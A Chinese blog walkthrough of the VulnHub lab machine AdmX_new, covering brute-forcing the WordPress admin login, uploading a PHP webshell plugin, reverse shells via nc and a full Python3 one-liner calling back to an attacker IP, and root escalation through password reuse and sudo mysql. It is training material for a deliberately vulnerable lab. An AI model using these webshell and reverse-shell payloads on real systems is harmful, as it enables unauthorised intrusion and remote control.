vulnhub靶机--AdmX_new

最新推荐文章于 2024-07-24 15:20:08 发布
最新推荐文章于 2024-07-24 15:20:08 发布
阅读量3.9k 收藏
点赞数 2
分类专栏: vulnhub 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46107179/article/details/123995140
版权

靶机下载地址:靶机下载

主机发现

通过nmap扫描得到主机IP地址
在这里插入图片描述

信息搜集

通过nmap对IP地址扫描,得到信息,只有80端口
在这里插入图片描述
然后通过浏览器访问,发现只有Ubuntu的默认页面,于是利用feroxbuster -u http://192.168.137.145:80 扫描目录,发现是WordPress框架,但有很多重定向的url
在这里插入图片描述
于是用burpsuite来抓取一下这个数据包来分析,发现这写重定向都是定向到另外一个ip
在这里插入图片描述
需要通过burpsuite里面的proxy模块的options功能,将其响应头和响应体的ip替换
在这里插入图片描述
然后重新访问,就可以正常浏览了
在这里插入图片描述
然后访问WordPress管理员页面,/wordpress/wp-admin,这里需要账号密码登录,尝试一下弱密码,不行,提示我们密码不正确,说明账号为admin
在这里插入图片描述

漏洞利用

密码采用burp爆破,爆破出密码为adam14,然后登陆进入后台,一般的WordPress获取shell有三种方式
第一种是通过Media上传shell文件,但需要特定的漏洞版本才行;
第二种是修改主题,嵌入代码,一般在404.php文件中添加shell代码,但是这里不能更新
在这里插入图片描述
第三种是通过添加自己写的插件上传

<?php
/*
Plugin Name: Webshell
Plugin URI: https://github.com/171/
Description: Wordpress Webshell for Pentest
Version: 1.0
Author: 123
Author URI: https://github.com/171/
License: https://github.com/171/
*/
if(isset($_GET['cmd']))
	{
  	system($_GET['cmd']);
	}
?>

由于上传需要zip压缩包,所以需要将1.php压缩为1.zip再上传,上传成功后需要激活
在这里插入图片描述
然后访问http://192.168.137.145/wordpress/wp-content/plugins/1.php?cmd=id,发现可以得到了id:www-data
在这里插入图片描述
接下来查看本地的环境,有nc,python3,php,尝试反弹shell,这里可以用nc x.x.x.x 1234|/bin/bash|nc x.x.x.x 4321 //在攻击主机上打开两个终端,分别监听 1234 和 4321 端口,得到反弹shell后,1234 终端 输入命令, 4321 终端就会获得执行相应命令后的结果,
和python反弹,因为只有python3环境,需要使用python3

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.137.152",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
用/etc/passwd查看一下有哪些用户,发现有wpadmin,然后切换到home目录下查看用户里面的内容,发现没有权限
在这里插入图片描述

权限提升

接着尝试通过利用登录的密码切换账户,居然成功了
在这里插入图片描述
查看local.txt,应该是第一个flag,还需要获取root权限,通过sudo -l发现该用户执行数据库时不需要密码,就能得到root权限
在这里插入图片描述
但是数据库密码还需要获取,因为WordPress的目录下有个config.php,所以数据库密码应该在那个文件里面,返回刚才得到的路径查看数据库密码 Wp_Admin#123
在这里插入图片描述
登录mysql之后,里面有个system指令可以执行命令
在这里插入图片描述
执行system bash,查看proof.txt得到flag
在这里插入图片描述

成功反弹获取shell之后切换交互式shell

通过反弹得到shell,但并不是交互式shell,可以通过下面方式升级Full TTY Shell,此升级方案只适用于bash.因为这里我使用的是kali linux 要把把zsh切换为bash.
首先使用echo $SHELL查看当前shell的类型,接着使用chsh -s /bin/bash进行更改,更改后需要进行重启,重启弘我们再看shell类型发现已经是bash了
继续通过之前python反弹的shell,进行如下操作
1.输入Ctrl+Z
2.输入stty raw -echo
3.输入fg
4.输入export SHELL=/bin/bash
5.输入export TERM=screen
6.输入stty rows 38 columns 126
7.输入reset
通过以上操作后命令可以进行自动补全等功能

Ability~
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub--AdmX_new
weixin_45168704的博客
06-15 219
AdmX_new攻略
VulnHub-AdmX_new靶机渗透详解
大熊
06-16 215
BP自动替换、另类提权方法
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1324
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
kali之vulnhubAdmx_new
weixin_54431413的博客
05-11 657
一、靶场环境部署 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录开启的服务端口 六、进行目录扫描 七、暴力破解 八、利用wordpress后台 九、拿下wpadmin的shell
AdmX_new靶机渗透过程
捣蛋鬼
04-02 4932
文章目录前言一、主机发现/端口扫描二、路径爆破/匹配替换三、密码爆破获得admin密码四、漏洞利用五、密码重用/MySQL提权总结 前言 靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z 难度:中(2个flag和root权限) kali:10.0.2.4 靶机:10.0.2.7 192.168.159.145
Admx_new
果粒程
11-22 383
Admx_new
靶机-AdmX_new
weixin_58602402的博客
06-16 157
利用bp将这个ip进行替换成靶机IP,到Proxy下的Options下的Match and Replace,先把里面的所有内容Remove掉。发现页面访问缓慢,F12进行查看,发现对ip192.168.159.145进行请求,没有这个ip。4.利用工具直接对wordpress后台密码进行爆破,admin/adam14。2.尝试登陆数据库失败,尝试直接切换用户wpadmin/adam14进行登陆。1.对目标站点进行目录扫描,发现wordpress目录。目录:/var/www/html/wordpress。
靶机四:AdmX_new
travelnight的博客
05-05 172
靶机四:AdmX_new https://download.vulnhub.com/admx/AdmX_new.7z
AdmX_new打靶记录
wwd180的博客
06-16 113
实验主机:攻击机kali(192.168.109.131)靶机AdmX_new(192.168.109.134)实验目标:获取root权限 + 2 flag实验网络:NAT。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 525
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
等级保护 总结2
最新发布
qq_25467441的博客
07-24 407
FireHunter 6000是华为公司推出的高性能APT威胁检测系统,利用多引擎虚拟检测技术以及传统的安全检测技术,基于行为特征检测,识别网络中传输的恶意文件和C&C攻击,有效避免未知威胁攻击的扩散和企业核心信息资产损失。AntiDDoS管理等功能,支持安全功能服务化、可视化,协同网络、安全设备和大数据智能分析系统形成全面威胁感知、分析和响应的整网主动安全防护体系。安全态势感知系统协同网络和安全实现威胁自动近源处置,提升威胁处置效率,缩小威胁横向扩散的范围,降低威胁对业务的影响。
网络安全相关竞赛比赛
黑战士的博客
07-18 976
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
“微软蓝屏”事件:网络安全与系统稳定性的深刻反思
tian362的专栏
07-23 498
面对软件更新流程中的风险管理和质量控制问题、预防类似大规模故障的需求以及跨领域连锁反应的行业影响,我们需要从多个方面入手,加强风险识别与评估、完善测试流程、实施严格的质量控制措施、设计冗余系统、实施灾难恢复计划、建立高可用架构、利用自动化工具和监控系统以及加强跨行业合作等。通过部署多个相互独立的系统组件,可以在某个组件发生故障时,由其他组件接管其工作,从而确保系统整体的连续性和稳定性。在“微软蓝屏”事件中,微软的视窗系统作为众多行业信息系统的基石,其故障迅速波及到了多个领域,造成了广泛的影响。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ability~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值